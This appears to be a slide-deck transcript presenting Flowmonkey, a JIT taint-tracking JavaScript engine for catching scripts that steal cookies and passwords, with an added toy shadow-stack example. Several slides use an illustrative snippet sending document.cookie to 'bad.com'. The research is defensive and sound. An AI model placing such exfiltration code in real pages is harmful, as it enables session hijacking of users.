document.cookie Identity Theft ✗ Cookie Stealing.


1

2

3 document.cookie Identity Theft ✗ Cookie Stealing

4 Password, Credit card #, Browsing history

5

6 Epidemic of Data Stealing JavaScript!

7 How to Detect Data Stealing? Without Sacrificing Performance?

8 Motivation | Dynamic Taint Tracking | Flowmonkey | Future Work & Conclusion

9 Dynamic Taint Tracking: Tracks where a value goes at runtime

10

11 Dynamic Taint Tracking
   1. Tag a value with a taint
   2. Propagate taints with the value
   3. Block taints from untrusted sinks

12 Example: Cookie Stealing
   ck = document.cookie;
   data = tmp + ck;
   send("bad.com", data);

13 Example: Cookie Stealing. Inject Taints (At confidential sources)
   ck = document.cookie;
   data = tmp + ck;
   send("bad.com", data);
   Highlighted: document.cookie

14 Example: Cookie Stealing. Propagate Taints (At assignments, etc)
   ck = document.cookie;
   data = tmp + ck;
   send("bad.com", data);
   Highlighted: ck; tmp + ck; data

15 Example: Cookie Stealing. Block Taints (At untrusted sinks)
   ck = document.cookie;
   data = tmp + ck;
   send("bad.com", data);
   Highlighted: "cr=" + color; send("bad.com", data);

16 Dynamic Taint Tracking: Policies
   Cookie Protection: cookie ✗ send()
   Password Protection: password ✗ send()
   General Policy: secret info ✗ expression

17 Dynamic Taint Tracking: JS
   - Cross site scripting prevention with dynamic data tainting and static analysis, NDSS'07
   - Analyzing information flow in JavaScript-based browser extensions, ACSAC'09
   - An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications, CCS'10
   10~100x slowdown

18 Goal: Make It Fast

19 Motivation | Dynamic Taint Tracking | Flowmonkey | Future Work & Conclusion

20 [Diagram: Source code, Interpreter, JIT Engine] Based on Jaegermonkey. Modification: Taint tracking logic is augmented

21 Language Extensions
   __taint(val, t)
   val: a value to be tainted
   t: a taint to be used

22 Language Extensions
   __taintof(val)
   returns the taint of val

23 Language Extensions
   var secret = __taint(34349, 1);
   tmp = secret * 68;
   tmp2 = tmp + "345";
   tmp3 = parseInt(tmp2);
   alert(__taintof(tmp)); // 1 is printed

24 Implementation: Shadow Stack
   s * 6
   push s   // s = 5
   push 6
   mul
   Real Stack: 5, 6 -> 30
   Shadow Stack: s's taint, 6's taint -> Joined taint

25 Implementation: Shadow Property
   a.fld = secret
   Real Properties of a: fld, …
   Shadow Properties of a: fld's taint, …
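
The tag / propagate / block steps from the cookie-stealing slides, run on a toy stack machine that keeps a shadow stack in lockstep with the real one. This is an added example, not Flowmonkey code or code from the slides; the bytecode ops, taint bit values, policy table, cookie value and `run`/`demo` names are assumptions made for illustration.

```javascript
// Added example (not Flowmonkey code): toy stack machine with a shadow stack.
const TAINT = { NONE: 0, COOKIE: 1, PASSWORD: 2 };       // assumed taint bits
const POLICY = { send: TAINT.COOKIE | TAINT.PASSWORD };  // assumed: bits barred from send()

function run(program, env) {
  const stack = [], shadow = [];     // real stack and shadow stack move together
  const vars = {}, varTaint = {};    // variables and their shadow taints
  const sent = [], blocked = [];
  for (const [op, arg] of program) {
    switch (op) {
      case "const":                  // literals carry no taint
        stack.push(arg); shadow.push(TAINT.NONE); break;
      case "source": {               // step 1: tag at a confidential source
        const src = env.sources[arg];
        stack.push(src.value); shadow.push(src.taint); break;
      }
      case "load":
        stack.push(vars[arg]); shadow.push(varTaint[arg] || TAINT.NONE); break;
      case "store":
        vars[arg] = stack.pop(); varTaint[arg] = shadow.pop(); break;
      case "add": {                  // step 2: result gets the join of both taints
        const b = stack.pop(), a = stack.pop();
        const tb = shadow.pop(), ta = shadow.pop();
        stack.push(a + b); shadow.push(ta | tb); break;
      }
      case "send": {                 // step 3: enforce the policy at the sink
        const data = stack.pop(), t = shadow.pop();
        if (!env.trustedHosts.includes(arg) && (t & POLICY.send))
          blocked.push({ host: arg, taint: t });
        else sent.push({ host: arg, data });
        break;
      }
      default: throw new Error("unknown op " + op);
    }
  }
  return { sent, blocked, varTaint };
}

// Constructed input: the slides' script as toy bytecode, plus an untainted send.
const env = { trustedHosts: [],
  sources: { "document.cookie": { value: "sid=abc123", taint: TAINT.COOKIE } } };
const cookieStealing = [
  ["source", "document.cookie"], ["store", "ck"],      // ck = document.cookie
  ["const", "cr=blue"], ["store", "tmp"],
  ["load", "tmp"], ["load", "ck"], ["add"], ["store", "data"],  // data = tmp + ck
  ["load", "data"], ["send", "bad.com"],               // tainted: blocked
  ["load", "tmp"], ["send", "bad.com"],                // untainted: allowed
];
function demo() { return run(cookieStealing, env); }
```

The tainted `data` is stopped at `send` while the untainted `tmp` still goes out, so the policy blocks the flow rather than the destination.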

26 Hybrid Approach: Full-fledged Taint Tracking Interpreter | Taint Detecting JIT Engine

27 Hybrid Approach: Full-fledged Taint Tracking Interpreter | Taint Detecting JIT Engine (if it doesn't touch a taint)

28 Hybrid Approach: Full-fledged Taint Tracking Interpreter | Taint Detecting JIT Engine. Taint detected!! Do full-fledged taint tracking

29 Hybrid Approach: Rapid prototyping; Fast with few taints; Slow with many taints

30 Performance: Baseline. Sunspider: cookie doesn't flow to 3rd party code

31 Performance: Cookie Tracking. Sunspider: cookie doesn't flow to 3rd party code

32 Demo

33 Motivation | Dynamic Taint Tracking | Flowmonkey | Future Work & Conclusion

34 Future Work
   Missing Flows: Implicit Flows, Timing Channel, etc
   Empirical Study: To prove the usability of taint tracking

35 Conclusions
   A Fast Hybrid Taint Tracking Engine: First JIT-enabled taint tracking engine
   Still Many Missing Parts: Possible to make it a protection tool? Can we sacrifice some performance?

36 Resources: http://firebird.ucsd.edu/flowmonkey

37 Thank you!

